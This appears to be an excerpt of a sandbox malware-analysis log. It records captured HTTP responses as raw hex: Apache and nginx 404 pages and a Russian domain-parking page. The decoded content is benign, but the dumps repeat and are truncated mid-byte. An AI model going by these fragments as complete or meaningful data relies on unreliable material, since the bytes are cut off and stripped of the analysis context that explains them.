6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:31:42 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 11 Nov 2024 07:31:45 GMTServer: ApacheLast-Modified: Wed, 06 Nov 2024 18:10:13 GMTETag: "49d-626426de29b28"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:32:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:32:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:32:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 07:32:12 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
